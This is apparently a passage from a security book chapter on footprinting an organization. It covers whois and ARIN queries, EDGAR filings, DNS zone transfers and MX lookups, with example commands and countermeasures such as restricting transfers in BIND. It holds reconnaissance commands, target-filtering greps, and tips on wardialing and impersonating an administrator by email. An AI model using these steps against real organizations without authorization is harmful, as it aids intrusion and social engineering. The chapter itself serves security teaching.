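    """Yield (path, comment) pairs for files under root whose
    extension starts with .htm (for example .htm and .html)."""
    for path in sorted(Path(root).rglob("*.htm*")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for comment in extract_comments(text):
            yield path, comment
```

Calling scan_mirror on the directory that holds the mirrored copy (the location is whatever you chose when mirroring) and printing each pair gives a quick inventory of comments worth removing before publication.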
After studying web pages, you can perform open source searches for information relating
to the target organization. News articles, press releases, and so on, may provide additional
clues about the state of the organization and their security posture. Web sites
such as finance.yahoo.com or http://www.companysleuth.com provide a plethora of information.
If you are profiling a company that is mostly Internet based, you may find by
searching for related news stories that they have had numerous security incidents. Using
your web search engine of choice will suffice for this activity. However, there are more
advanced searching tools and criteria you can use to uncover additional information.
The FerretPRO suite of search tools from FerretSoft (http://www.ferretsoft.com) is
one of our favorites. WebFerretPRO enables you to search many different search engines
simultaneously. In addition, other tools in the suite allow you to search IRC, USENET,
email, and file databases looking for clues. Also, if you’re looking for a free solution to
search multiple search engines, check out http://www.dogpile.com.
Searching USENET for postings related to @example.com often reveals useful information.
In one case, we saw a posting from a system administrator’s work account regarding
his new PBX system. He said this switch was new to him, and he didn’t know
how to turn off the default accounts and passwords. We’d hate to guess how many phone
phreaks were salivating over the prospect of making free calls at that organization. Needless
to say, you can gain additional insight into the organization and the technical prowess
of its staff just by reviewing their postings.
Lastly, you can use the advanced searching capabilities of some of the major search
engines like AltaVista or Hotbot. These search engines provide a handy facility that allows
you to search for all sites that have links back to the target organization’s domain. This
may not seem significant at first, but let’s explore the implications. Suppose someone in
an organization decides to put up a rogue web site at home or on the target network’s site.
This web server may not be secure or sanctioned by the organization. So we can begin to
look for potential rogue web sites just by determining which sites actually link to the target
organization’s web server, as shown in Figure 1-1.
You can see that the search returned all sites that link back to http://www.l0pht.com
and that contain the word “hacking.” So you could easily use this search facility to find
sites linked to your target domain.
The last example, depicted in Figure 1-2, allows you to limit your search to a particular
site. In our example, we searched http://www.l0pht.com for all occurrences of
“mudge.” This query could easily be modified to search for other items of interest.
Obviously, these examples don’t cover every conceivable item to search for during
your travels—be creative. Sometimes the most outlandish search yields the most productive
results.
EDGAR Search
For targets that are publicly traded companies, you can consult the Securities and Exchange
Commission (SEC) EDGAR database at http://www.sec.gov, as shown in Figure 1-3.
One of the biggest problems organizations have is managing their Internet connections,
especially when they are actively acquiring or merging with other entities. So it is
important to focus on newly acquired entities. Two of the best SEC publications to review
are the 10-Q and 10-K. The 10-Q is a quick snapshot of what the organization has done
over the last quarter. This update includes the purchase or disposition of other entities.
The 10-K is a yearly update of what the company has done and may not be as timely as the
10-Q. It is a good idea to peruse these documents by searching for “subsidiary” or “subsequent
events.” This may provide you with information on a newly acquired entity. Often
organizations will scramble to connect the acquired entities to their corporate network
with little regard for security. So it is likely that you may be able to find security weaknesses
Figure 1-1. With the AltaVista search engine, use the link:www.example.com directive to
query all sites with links back to the target domain.
in the acquired entity that would allow you to leapfrog into the parent company. Attackers
are opportunistic and are likely to take advantage of the chaos that normally comes
with combining networks.
With an EDGAR search, keep in mind that you are looking for entity names that are
different from the parent company. This will become critical in subsequent steps when
you perform organizational queries from the various whois databases available (see
“Step 2. Network Enumeration”).
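The keyword review of a 10-Q or 10-K described above can be sketched in a few lines of Python, assuming the filing has already been saved as plain text. The function name, the snippet width, and the keyword tuple are choices made for this example rather than anything prescribed by EDGAR.

```python
import re

# Search terms suggested in the text above
KEYWORDS = ("subsidiary", "subsequent events")


def find_mentions(filing_text, keywords=KEYWORDS, width=60):
    """Return (keyword, snippet) pairs for each case-insensitive match."""
    hits = []
    for keyword in keywords:
        for match in re.finditer(re.escape(keyword), filing_text, re.IGNORECASE):
            start = max(0, match.start() - width)
            end = min(len(filing_text), match.end() + width)
            # Collapse whitespace so each snippet prints on one line
            snippet = " ".join(filing_text[start:end].split())
            hits.append((keyword, snippet))
    return hits
```

Each snippet shows the surrounding text, which is usually enough to spot an entity name that differs from the parent company.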
Countermeasure: Public Database Security
Much of the information discussed earlier must be made publicly available; this is especially
true for publicly traded companies. However, it is important to evaluate and classify
the type of information that is publicly disseminated. The Site Security Handbook (RFC
2196) can be found at http://www.ietf.org/rfc/rfc2196.txt and is a wonderful resource
Figure 1-2. With AltaVista, use the host:example.com directive to query the site for the
specified string (for example, “mudge”).
for many policy-related issues. Finally, remove any unnecessary information from your
web pages that may aid an attacker in gaining access to your network.
Step 2. Network Enumeration
Popularity: 9
Simplicity: 9
Impact: 5
Risk Rating: 8
The first step in the network enumeration process is to identify domain names and
associated networks related to a particular organization. Domain names represent the
Figure 1-3. The EDGAR database allows you to query public documents, providing important
insight into the breadth of the organization by identifying its associated entities.
company’s presence on the Internet and are the Internet equivalent to your company’s
name, such as “AAAApainting.com” and “moetavern.com.”
To enumerate these domains and begin to discover the networks attached to them,
you must scour the Internet. There are multiple whois databases you can query that will
provide a wealth of information about each entity we are trying to footprint. Before the
end of 1999, Network Solutions had a monopoly as the main registrar for domain names
(com, net, edu, and org) and maintained this information on their whois servers. This
monopoly was dissolved and currently there is a multitude of accredited registrars
(http://www.internic.net/alpha.html). Having new registrars available adds steps in
finding our targets (see “Registrar Query” later in this step). We will need to query the
correct registrar for the information we are looking for.
There are many different mechanisms (see Table 1-2) to query the various whois databases.
Regardless of the mechanism, you should still receive the same information. Users
should consult Table 1-3 for other whois servers when looking for domains other than
com, net, edu, or org. Another valuable resource, especially for finding whois servers outside
of the United States, is http://www.allwhois.com. This is one of the most complete
whois resources on the Internet.
Mechanism                Resources                                      Platform
Web interface            http://www.networksolutions.com/               Any platform with a web client
                         http://www.arin.net
Whois client             Whois is supplied with most versions of UNIX.  UNIX
                         Fwhois was created by Chris Cappuccio
WS_Ping ProPack          http://www.ipswitch.com/                       Windows 95/NT/2000
Sam Spade                http://www.samspade.org/ssw                    Windows 95/NT/2000
Sam Spade Web Interface  http://www.samspade.org/                       Any platform with a web client
Netscan tools            http://www.netscantools.com/nstpromain.html    Windows 95/NT/2000
Xwhois                   http://c64.org/~nr/xwhois/                     UNIX with X and GTK+ GUI toolkit
Table 1-2. Whois Searching Techniques and Data Sources
Different information can be gleaned with each query. The following query types
provide the majority of information hackers use to begin their attack:
- Registrar: Displays specific registrar information and associated whois servers
- Organizational: Displays all information related to a particular organization
- Domain: Displays all information related to a particular domain
- Network: Displays all information related to a particular network or a single IP address
- Point of contact (POC): Displays all information related to a specific person, typically the administrative contact
Registrar Query
With the advent of the shared registry system (that is, multiple registrars), we must consult
the whois.crsnic.net server to obtain a listing of potential domains that match our
target and their associated registrar information. We need to determine the correct registrar
so that we can submit detailed queries to the correct database in subsequent steps.
For our example, we will use “Acme Networks” as our target organization and perform
our query from a UNIX (Red Hat 6.2) command shell. In the version of whois we are using,
the @ option allows you to specify an alternate database. In some BSD-derived
whois clients (for example, OpenBSD or FreeBSD), it is possible to use the –a option to
specify an alternate database. You should man whois for more information on how to submit
whois queries with your whois client.
It is advantageous to use a wildcard when performing this search because it will provide
additional search results. Using a “.” after “acme” will list all occurrences of domains that
begin with “acme” rather than domains that simply match “acme” exactly. In addition,
consult http://www.networksolutions.com/en_US/help/whoishelp.html for additional
information on submitting advanced searches. Many of the hints contained in this document
can help you dial-in your search with much more precision.
Whois Server Addresses
European IP Address Allocations http://www.ripe.net/
Asia Pacific IP Address Allocations http://whois.apnic.net
U.S. military http://whois.nic.mil
U.S. government http://whois.nic.gov
Table 1-3. Government, Military, and International Sources of Whois Databases
[bash]$ whois "acme."@whois.crsnic.net
[whois.crsnic.net]
Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
ACMETRAVEL.COM
ACMETECH.COM
ACMES.COM
ACMERACE.NET
ACMEINC.COM
ACMECOSMETICS.COM
ACME.ORG
ACME.NET
ACME.COM
ACME-INC.COM
If we are interested in obtaining more information on acme.net, we can continue to
drill down further to determine the correct registrar.
[bash]$ whois "acme.net"@whois.crsnic.net
Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: ACME.NET
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: www.networksolutions.com
Name Server: DNS1.ACME.NET
Name Server: DNS2.ACME.NET
We can see that Network Solutions is the registrar for this organization, which is quite
common for any organization on the Internet before adoption of the shared registry system.
For subsequent queries, we must query the respective registrar’s database because
they maintain the detailed information we want.
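When you review many such responses, it can help to pull the labeled fields out of the text. The Python sketch below assumes you have already captured the response as a string; the function name is made up for this example, and the "Key: value" layout is taken from the sample output above rather than from any formal specification.

```python
def parse_registrar_record(response_text):
    """Parse 'Key: value' lines into a dict mapping each key to a list
    of values (a list because keys such as 'Name Server' repeat)."""
    record = {}
    for line in response_text.splitlines():
        # Split on colon-plus-space so URLs in the banner are not split
        key, sep, value = line.partition(": ")
        key, value = key.strip(), value.strip()
        if not sep or not key or not value:
            continue  # skip banner text and blank lines
        record.setdefault(key, []).append(value)
    return record
```

The value under "Whois Server" is the registrar database that the subsequent queries in this step should be directed to.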
Organizational Query
Once we have identified a registrar, we can submit an organizational query. This type of
query will search a specific registrar for all instances of the entity name and is broader
than looking for just a domain name. We must use the keyword “name” and submit the
query to Network Solutions.
[bash]$ whois "name Acme Networks"@whois.networksolutions.com
Acme Networks (NAUTILUS-AZ-DOM) NAUTILUS-NJ.COM
Acme Networks (WINDOWS4-DOM) WINDOWS.NET
Acme Networks (BURNER-DOM) BURNER.COM
Acme Networks (ACME2-DOM) ACME.NET
Acme Networks (RIGHTBABE-DOM) RIGHTBABE.COM
Acme Networks (ARTS2-DOM) ARTS.ORG
Acme Networks (HR-DEVELOPMENT-DOM) HR-DEVELOPMENT.COM
Acme Networks (NTSOURCE-DOM) NTSOURCE.COM
Acme Networks (LOCALNUMBER-DOM) LOCALNUMBER.NET
Acme Networks (LOCALNUMBERS2-DOM) LOCALNUMBERS.NET
Acme Networks (Y2MAN-DOM) Y2MAN.COM
Acme Networks (Y2MAN2-DOM) Y2MAN.NET
Acme Networks for Christ Hospital (CHOSPITAL-DOM) CHOSPITAL.ORG
...
From this, we can see many different domains are associated with Acme Networks.
However, are they real networks associated with those domains, or have they been registered
for future use or to protect a trademark? We need to continue drilling down until
we find a live network.
When you are performing an organizational query for a large organization, there may
be hundreds or thousands of records associated with it. Before spamming became so
popular, it was possible to download the entire com domain from Network Solutions.
Knowing this, Network Solutions whois servers will truncate the results and only display
the first 50 records.
Domain Query
Based on our organizational query, the most likely candidate to start with is the Acme.net
domain since the entity is Acme Networks. (Of course, all real names and references have
been changed.)
[bash]$ whois acme.net@whois.networksolutions.com
[whois.networksolutions.com]
Registrant:
Acme Networks (ACME2-DOM)
11 Town Center Ave.
Einstein, AZ 21098
Domain Name: ACME.NET
Administrative Contact, Technical Contact, Zone Contact:
Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
201-555-9011 (201)555-3338 (FAX) 201-555-1212
Record last updated on 13-Sep-95.
Record created on 30-May-95.
Database last updated on 14-Apr-99 13:20:47 EDT.
Domain servers in listed order:
DNS.ACME.NET 10.10.10.1
DNS2.ACME.NET 10.10.10.2
This type of query provides you with information related to the following:
- The registrant
- The domain name
- The administrative contact
- When the record was created and updated
- The primary and secondary DNS servers
At this point, you need to become a bit of a cybersleuth. Analyze the information for
clues that will provide you with more information. We commonly refer to excess information
or information leakage as “enticements.” That is, they may entice an attacker into
mounting a more focused attack. Let us review this information in detail.
By inspecting the registrant information, we can ascertain if this domain belongs to
the entity that we are trying to footprint. We know that Acme Networks is located in Arizona,
so it is safe to assume this information is relevant to our footprint analysis. Keep in
mind, the registrant’s locale doesn’t necessarily have to correlate to the physical locale of
the entity. Many entities have multiple geographic locations, each with its own Internet
connections; however, they may all be registered under one common entity. For your domain,
it would be necessary to review the location and determine if it was related to your
organization. The domain name is the same domain name that we used for our query, so
this is nothing new to us.
The administrative contact is an important piece of information because it may tell
you the name of the person responsible for the Internet connection or firewall. It also lists
voice and fax numbers. This information is an enormous help when you’re performing a
dial-in penetration review. Just fire up the wardialers in the noted range, and you’re off to
a good start in identifying potential modem numbers. In addition, an intruder will often
pose as the administrative contact, using social engineering on unsuspecting users in an
organization. An attacker will send spoofed email messages posing as the administrative
contact to a gullible user. It is amazing how many users will change their password to
whatever you like, as long as it looks like the request is being sent from a trusted technical
support person.
The record creation and modification dates indicate how accurate the information is.
If the record was created five years ago but hasn’t been updated since, it is a good bet
some of the information (for example, Administrative Contact) may be out of date.
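A quick way to judge how stale a record is, for instance when auditing your own registrations, is to compute the time since its last update. This Python sketch assumes the DD-Mon-YY date style shown in the sample record above and an English locale for month abbreviations; the function names are invented for the example.

```python
from datetime import datetime


def parse_whois_date(text):
    """Parse a date such as '13-Sep-95' (a trailing period is tolerated).

    Two-digit years follow Python's %y rule: 69-99 map to 1969-1999.
    """
    return datetime.strptime(text.strip().rstrip("."), "%d-%b-%y").date()


def years_since_update(updated, as_of):
    """Approximate number of years between two dates."""
    return (as_of - updated).days / 365.25
```

Applied to the sample record, the gap between "Record last updated on 13-Sep-95" and "Database last updated on 14-Apr-99" is roughly three and a half years, which suggests the contact details deserve a second look.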
The last piece of information provides you with the authoritative DNS servers. The
first one listed is the primary DNS server, and subsequent DNS servers will be secondary,
tertiary, and so on. We will need this information for our DNS interrogation discussed
later in this chapter. Additionally, we can try to use the network range listed as a starting
point for our network query of the ARIN database.
Using a server directive with the HST record gained from a whois query, you can discover the other
domains for which a given DNS server is authoritative. The following steps show you how.
1. Execute a domain query as detailed earlier.
2. Locate the first DNS server.
3. Execute a whois query on that DNS server:
whois "HOST 10.10.10.1"@whois.networksolutions.com
4. Locate the HST record for the DNS server.
5. Execute a whois query with the server directive using whois and
the respective HST record:
whois "SERVER NS9999-HST"@whois.networksolutions.com
Network Query
The American Registry for Internet Numbers (ARIN) is another database that we can use
to determine networks associated with our target domain. This database maintains specific
network blocks that an organization owns. It is particularly important to perform
this search to determine if a system is actually owned by the target organization or if it is
being co-located or hosted by another organization such as an ISP.
In our example, we can try to determine all the networks that “Acme Networks”
owns. Querying the ARIN database is a particularly handy query because it is not subject
to the 50-record limit implemented by Network Solutions. Note the use of the “.” wildcard.
[bash]$ whois "Acme Net."@whois.arin.net
[whois.arin.net]
Acme Networks (ASN-XXXX) XXXX 99999
Acme Networks (NETBLK) 10.10.10.0 – 10.20.129.255
A more specific query can be submitted based upon a particular net block (10.10.10.0).
[bash]$ whois 10.10.10.0@whois.arin.net
[whois.arin.net]
Major ISP USA (NETBLK-MI-05BLK) MI-05BLK 10.10.0.0 - 10.30.255.255
ACME NETWORKS, INC. (NETBLK-MI-10-10-10) CW-10-10-10
10.10.10.0 - 10.20.129.255
ARIN provides a handy web-based query mechanism, as shown in Figure 1-4. By reviewing
the output, we can see that “Major ISP USA” is the main backbone provider and has
assigned a class A network (see TCP/IP Illustrated Volume 1 by Richard Stevens for a complete
discussion of TCP/IP) to Acme Networks. Thus, we can conclude that this is a valid
network owned by Acme Networks.
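To check whether a given address actually falls inside a registered block, the comparison can be done with Python's standard ipaddress module. This is only a sketch; the function name is an assumption, and the ranges used in the usage note are the ones shown in the sample output above.

```python
import ipaddress


def in_block(address, first, last):
    """Return True if address lies within the inclusive range first..last."""
    ip = ipaddress.ip_address(address)
    return ipaddress.ip_address(first) <= ip <= ipaddress.ip_address(last)
```

For example, in_block("10.10.10.1", "10.10.10.0", "10.20.129.255") places the first DNS server inside the Acme Networks block, while an address such as 10.30.0.1 falls outside it and would belong to the provider's wider allocation instead.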
POC Query
Since the administrative contact may be the administrative contact for multiple organizations,
it is advantageous to perform a point of contact (POC) query to search by the user’s
Figure 1-4. One of the easiest ways to search for ARIN information is from their web site.
database handle. The handle we are searching for is “WB9201,” derived from the preceding
domain query. You may uncover a domain that you were unaware of.
[bash]$ whois "HANDLE WB9201"@whois.networksolutions.com
Boyd, Woody [Network Engineer] (WB9201) woody@ACME.NET
BIG ENTERPRISES
11 TOWN CENTER AVE
EINSTEIN, AZ 20198
201-555-1212 (201)555-1212 (FAX) 201-555-1212
We could also search for @Acme.net to obtain a listing of all mail addresses for a given
domain. We have truncated the following results for brevity:
[bash]$ whois "@acme.net"@whois.networksolutions.com
Smith, Janet (JS9999) jsmith@ACME.NET (201)555-9211 (FAX) (201)555-3643
Benson, Bob (BB9999) bob@ACME.NET (201)555-0988
Manual, Eric(EM9999) ericm@ACME.NET (201)555-8484 (FAX) (201)555-8485
Bixon, Rob (RB9999) rbixon@ACME.NET (201)555-8072
Countermeasure: Public Database Security
Much of the information contained in the various databases discussed thus far is geared
at public disclosure. Administrative contacts, registered net blocks, and authoritative
name server information is required when an organization registers a domain on the
Internet. However, security considerations should be employed to make the job of attackers
much more difficult.
Many times an administrative contact will leave an organization and still be able to
change the organization’s domain information. Thus, first ensure that the information listed
in the database is accurate. Update the administrative, technical, and billing contact information
as necessary. Furthermore, consider the phone numbers and addresses listed. These
can be used as a starting point for a dial-in attack or for social engineering purposes. Consider
using a toll-free number or a number that is not in your organization’s phone exchange.
In addition, we have seen several organizations list a fictitious administrative
contact, hoping to trip up a would-be social engineer. If any employee receives an email or
calls to or from the fictitious contact, it may tip off the information security department that
there is a potential problem.
Another hazard with domain registration arises from the way that some registrars allow
updates. For example, the current Network Solutions implementation allows automated
online changes to domain information. Network Solutions authenticates the domain registrant’s
identity through three different methods: the FROM field in an email, a password,
or via a Pretty Good Privacy (PGP) key. Shockingly, the default authentication method is
the FROM field via email. The security implications of this authentication mechanism are
prodigious. Essentially, anyone can trivially forge an email address and change the information
associated with your domain, better known as domain hijacking. This is exactly what
happened to AOL on October 16, 1998, as reported by the Washington Post. Someone impersonated
an AOL official and changed AOL’s domain information so that all traffic was
directed to autonete.net. AOL recovered quickly from this incident, but it underscores
the fragility of an organization’s presence on the Internet. It is important to choose a more
secure solution like password or PGP authentication to change domain information.
Moreover, the administrative or technical contact is required to establish the authentication
mechanism via Contact Form from Network Solutions.
Step 3. DNS Interrogation
After identifying all the associated domains, you can begin to query the DNS. DNS is a
distributed database used to map IP addresses to hostnames and vice versa. If DNS is
configured insecurely, it is possible to obtain revealing information about the organization.
Zone Transfers
Popularity: 9
Simplicity: 9
Impact: 3
Risk Rating: 7
One of the most serious misconfigurations a system administrator can make is allowing
untrusted Internet users to perform a DNS zone transfer.
A zone transfer allows a secondary master server to update its zone database from the
primary master. This provides for redundancy when running DNS, should the primary
name server become unavailable. Generally, a DNS zone transfer only needs to be performed
by secondary master DNS servers. Many DNS servers, however, are misconfigured
and provide a copy of the zone to anyone who asks. This isn’t necessarily bad if the only information
provided is related to systems that are connected to the Internet and have valid
hostnames, although it makes it that much easier for attackers to find potential targets. The
real problem occurs when an organization does not use a public/private DNS mechanism
to segregate their external DNS information (which is public) from its internal, private DNS
information. In this case, internal hostnames and IP addresses are disclosed to the attacker.
Providing internal IP address information to an untrusted user over the Internet is akin to
providing a complete blueprint, or roadmap, of an organization’s internal network.
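An administrator can audit an externally visible zone for this kind of leak by flagging records that point at non-public address space. The Python sketch below assumes the records have already been reduced to (hostname, address) pairs; the function name is hypothetical. Note that the standard library's is_private test covers more than the RFC 1918 ranges (it also flags loopback, link-local, and documentation blocks).

```python
import ipaddress


def internal_records(records):
    """Return the (hostname, address) pairs whose address is private."""
    return [
        (host, addr)
        for host, addr in records
        if ipaddress.ip_address(addr).is_private
    ]
```

Any entry this returns for a zone served to the Internet is a candidate for moving behind a separate internal DNS view.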
Let’s take a look at several methods we can use to perform zone transfers and the
types of information that can be gleaned. While there are many different tools to perform
zone transfers, we are going to limit the discussion to several common types.
A simple way to perform a zone transfer is to use the nslookup client that is
provided with most UNIX and NT implementations. We can use nslookup in interactive
mode as follows:
[bash]$ nslookup
Default Server: dns2.acme.net
Address: 10.10.20.2
>> server 10.10.10.2
Default Server: [10.10.10.2]
Address: 10.10.10.2
>> set type=any
>> ls -d Acme.net. >> /tmp/zone_out
We first run nslookup in interactive mode. Once started, it will tell you the default
name server that it is using, which is normally your organization’s DNS server or a DNS
server provided by your Internet service provider (ISP). However, our DNS server
(10.10.20.2) is not authoritative for our target domain, so it will not have all the DNS records
we are looking for. Thus, we need to manually tell nslookup which DNS server to
query. In our example, we want to use the primary DNS server for Acme Networks
(10.10.10.2). Recall that we found this information from our domain whois lookup performed
earlier.
Next we set the record type to any. This will allow you to pull any DNS records available
(see man nslookup for a complete list).
Finally, we use the ls option to list all the associated records for the domain. The -d
switch is used to list all records for the domain. We append a “.” to the end to signify the
fully qualified domain name; however, you can leave this off most times. In addition, we
redirect our output to the file /tmp/zone_out so that we can manipulate the output later.
After completing the zone transfer, we can view the file to see if there is any interesting
information that will allow us to target specific systems. Let’s review the output:
[bash]$ more zone_out
acct18      1D IN A     192.168.230.3
            1D IN HINFO "Gateway2000" "WinWKGRPS"
            1D IN MX    0 acmeadmin-smtp
            1D IN RP    bsmith.rci bsmith.who
            1D IN TXT   "Location:Telephone Room"
ce          1D IN CNAME aesop
au          1D IN A     192.168.230.4
            1D IN HINFO "Aspect" "MS-DOS"
            1D IN MX    0 andromeda
            1D IN RP    jcoy.erebus jcoy.who
            1D IN TXT   "Location: Library"
acct21      1D IN A     192.168.230.5
            1D IN HINFO "Gateway2000" "WinWKGRPS"
            1D IN MX    0 acmeadmin-smtp
            1D IN RP    bsmith.rci bsmith.who
            1D IN TXT   "Location:Accounting"
We won’t go through each record in detail, but we will point out several important
types. We see that each host entry has an A record that maps the system name on the left
to the IP address on the right. In addition, each host has an HINFO record that identifies
the platform or type of operating system running (HINFO is defined in RFC 1035; see also
RFC 952). HINFO records are not needed, but provide a wealth of information to attackers.
Since we saved the results of the zone transfer to an output file, we can easily manipulate
the results with UNIX programs like grep, sed, awk, or perl.
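As a minimal sketch of that kind of post-processing, the awk filter below pairs each system name with its HINFO data. It assumes the record layout shown in the listing above, in which continuation records omit the system name, so a line whose second field is IN inherits the most recent name. The function name hinfo_by_host is our own and is not part of any tool.

```shell
# hinfo_by_host: read an "ls -d" style zone dump on stdin and print
# "<owner> <hardware> <os>" for every HINFO record.
# Assumption: a record line is either "owner TTL IN TYPE data..." or,
# for continuation records, "TTL IN TYPE data...".
# Limitation: HINFO strings that contain spaces are not handled.
hinfo_by_host() {
    awk '
        $3 == "IN" { owner = $1; type = $4; hw = $5; os = $6 }
        $2 == "IN" { type = $3; hw = $4; os = $5 }
        type == "HINFO" {
            gsub(/"/, "", hw)
            gsub(/"/, "", os)
            print owner, hw, os
        }
        { type = "" }
    '
}
```

Running hinfo_by_host < /tmp/zone_out on the sample output would print one line per host, such as "acct18 Gateway2000 WinWKGRPS", which is easier to filter than the raw dump.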
Suppose we are experts in SunOS or Solaris. We could programmatically find out the
IP addresses that had an HINFO record associated with SPARC, Sun, or Solaris.
[bash]$ grep -i solaris zone_out | wc -l
388
We can see that we have 388 potential records that reference the word “Solaris.” Obviously,
we have plenty of targets.
Suppose we wanted to find test systems, which happen to be a favorite choice for attackers.
Why? Simple—they normally don’t have many security features enabled, often
have easily guessed passwords, and administrators tend not to notice or care who logs in
to them. They’re a perfect home for any interloper. Thus, we can search for test systems
as follows:
[bash]$ grep -i test /tmp/zone_out | wc -l
96
So 96 lines in the zone file contain the word “test.” This
should equate to a fair number of actual test systems. These are just a few simple examples.
Most intruders will slice and dice this data to zero in on specific system types with
known vulnerabilities.
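Note that grep piped to wc counts matching lines, and one host can contribute several lines (an A record, an HINFO record, a TXT record, and so on). A rough sketch that counts distinct system names instead is shown below. It again assumes the dump layout shown earlier, and the function name count_hosts is hypothetical.

```shell
# count_hosts WORD: read a zone dump on stdin and count the distinct
# owner names that have at least one record line containing WORD
# (case-insensitive, fixed-string match rather than a regular expression).
count_hosts() {
    awk -v pat="$1" '
        BEGIN { pat = tolower(pat) }
        $3 == "IN" { owner = $1 }          # lines that start a new owner
        index(tolower($0), pat) && !(owner in seen) { seen[owner] = 1; n++ }
        END { print n + 0 }
    '
}
```

For example, count_hosts test < /tmp/zone_out reports how many systems mention “test” in any of their records, which will usually be lower than the line count.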
Keep a few points in mind. The aforementioned method only queries one nameserver at
a time. This means that you would have to perform the same tasks for all nameservers that
are authoritative for the target domain. In addition, we only queried the Acme.net domain.
If there were subdomains, we would have to perform the same type of query for each
subdomain (for example, greenhouse.Acme.net). Finally, you may receive a message stating
that you can’t list the domain or that the query was refused. This usually indicates that
the server has been configured to disallow zone transfers from unauthorized users. Thus,
you will not be able to perform a zone transfer from this server. However, if there are multiple
DNS servers, you may be able to find one that will allow zone transfers.
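Because every authoritative nameserver has to be checked separately, it helps to generate the requests rather than type them. The sketch below only prints one dig zone-transfer command per nameserver; it does not contact anything itself. The function name axfr_commands is our own, and the nameserver list is assumed to arrive on standard input, one hostname per line.

```shell
# axfr_commands DOMAIN: read name server hostnames on stdin (one per line)
# and print one dig zone-transfer command per server.
axfr_commands() {
    domain=$1
    while IFS= read -r ns; do
        [ -n "$ns" ] || continue          # skip blank lines
        ns=${ns%.}                        # drop the trailing root dot, if any
        printf 'dig @%s %s axfr\n' "$ns" "$domain"
    done
}
```

A typical use would be dig +short NS acme.net | axfr_commands acme.net, reviewing the printed commands and then running them only against servers you are authorized to test. Administrators can use the same loop to confirm that every one of their own nameservers refuses the transfer.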
Now that we have shown you the manual method, there are plenty of tools that speed
the process, including host, Sam Spade, axfr, and dig.
The host command comes with many flavors of UNIX. Some simple ways of using
host are as follows:
host -l Acme.net
or
host -l -v -t any Acme.net
If you need just the IP addresses to feed into a shell script, you can just cut out the IP
addresses from the host command:
host -l acme.net | cut -f 4 -d" " >> /tmp/ip_out
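The cut approach prints the fourth field of every line, including lines that are not address records (for example, a "name server" line, whose fourth field is a hostname). A slightly more defensive sketch is shown below. It assumes address lines of the form "name has address 192.0.2.1", and the function name host_ips is hypothetical.

```shell
# host_ips: read "host -l" output on stdin and print only the addresses,
# one per line, with duplicates removed.
# Assumption: address lines end in "... has address <IP>".
host_ips() {
    awk 'NF >= 3 && $(NF-2) == "has" && $(NF-1) == "address" { print $NF }' |
        sort -u
}
```

It would be used as host -l acme.net | host_ips >> /tmp/ip_out.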
Not all footprinting functions must be performed through UNIX commands. A number
of Windows products provide the same information, as shown in Figure 1-5.
Figure 1-5. If you’re Windows inclined, you could use the multifaceted Sam Spade to perform a
zone transfer as well as other footprinting tasks.
Finally, you can use one of the best tools for performing zone transfers, axfr
(http://ftp.cdit.edu.cn/pub/linux/www.trinux.org/src/netmap/axfr-0.5.2.tar.gz) by Gaius. This
utility will recursively transfer zone information and create a compressed database of
zone and host files for each domain queried. In addition, you can even pass top-level domains
like com and edu to get all the domains associated with com and edu, respectively.
However, this is not recommended. To run axfr, you would type the following:
[bash]$ axfr Acme.net
axfr: Using default directory: /root/axfrdb
Found 2 name servers for domain 'Acme.net.':
Text deleted.
Received XXX answers (XXX records).
To query the axfr database for the information you just obtained, you would type
the following:
[bash]$ axfrcat Acme.net
Determine Mail Exchange (MX) Records
Determining where mail is handled is a great starting place to locate the target organization’s
firewall network. Often in a commercial environment, mail is handled on the same
system as the firewall, or at least on the same network. So we can use host to help harvest
even more information.
[bash]$ host Acme.net
Acme.net has address 10.10.10.1
Acme.net mail is handled (pri=20) by smtp-forward.Acme.net
Acme.net mail is handled (pri=10) by gate.Acme.net
If host is used without any parameters on just a domain name, it will try to resolve A
records first, then MX records. The preceding information appears to cross-reference
with the whois ARIN search we previously performed. Thus, we can feel comfortable
that this is a network we should be investigating.
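When a domain lists several mail exchangers, the one with the lowest preference value is tried first, so it is useful to sort them. The following sketch does that for the older host output wording shown above ("(pri=N) by HOST"); newer versions of host word this line differently, so treat the pattern as an assumption. The function name mx_by_preference is our own.

```shell
# mx_by_preference: read host output on stdin and list mail exchangers as
# "<preference> <host>", most preferred (lowest value) first.
# Assumption: MX lines use the "(pri=N) by HOST" wording.
mx_by_preference() {
    sed -n 's/.*mail is handled (pri=\([0-9][0-9]*\)) by \(.*\)$/\1 \2/p' |
        sort -n
}
```

For the example output, host Acme.net | mx_by_preference would list gate.Acme.net (10) ahead of smtp-forward.Acme.net (20).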
Countermeasure: DNS Security
DNS provides a plethora of information to attackers, so it is important to reduce
the amount of information available to the Internet. From a host configuration perspective,
you should restrict zone transfers to only authorized servers. For modern versions of
BIND, the allow-transfer directive in the named.conf file can be used to enforce the restriction.
To restrict zone transfers in Microsoft’s DNS, you can use the Notify option. (See
http://support.microsoft.com/support/kb/articles/q193/8/37.asp for more information.)
For other nameservers, you should consult the documentation to determine what steps
are necessary to restrict or disable zone transfers.
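To make the BIND restriction concrete, the sketch below prints a named.conf zone stanza whose allow-transfer list names only the secondaries you pass in. The helper name zone_stanza, the zone file name db.ZONE, and the secondary address used in the usage note are all illustrative assumptions; check the stanza against the documentation for your BIND version before using it.

```shell
# zone_stanza ZONE [SECONDARY_IP...]: print a named.conf master zone stanza
# that permits zone transfers only to the listed secondary servers.
# With no addresses given, transfers are disabled with "none".
# Assumption: the zone data lives in a file called db.ZONE.
zone_stanza() {
    zone=$1
    shift
    [ $# -gt 0 ] || set -- none
    acl=""
    for ip in "$@"; do
        acl="$acl $ip;"
    done
    printf 'zone "%s" {\n' "$zone"
    printf '    type master;\n'
    printf '    file "db.%s";\n' "$zone"
    printf '    allow-transfer {%s };\n' "$acl"
    printf '};\n'
}
```

For instance, zone_stanza acme.net 10.10.10.3 produces a stanza containing allow-transfer { 10.10.10.3; }; so that only that one secondary may pull the zone.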
On the network side, you could configure a firewall or packet-filtering router to deny
all unauthorized inbound connections to TCP port 53. Since name lookup requests are
normally UDP and zone transfer requests are TCP, this will effectively thwart a zone transfer attempt.
However, this countermeasure is a violation of the RFC, which states that DNS
messages greater than 512 bytes will be sent via TCP. In most cases, DNS messages will easily
fit within 512 bytes. A better solution would be to implement cryptographic Transaction
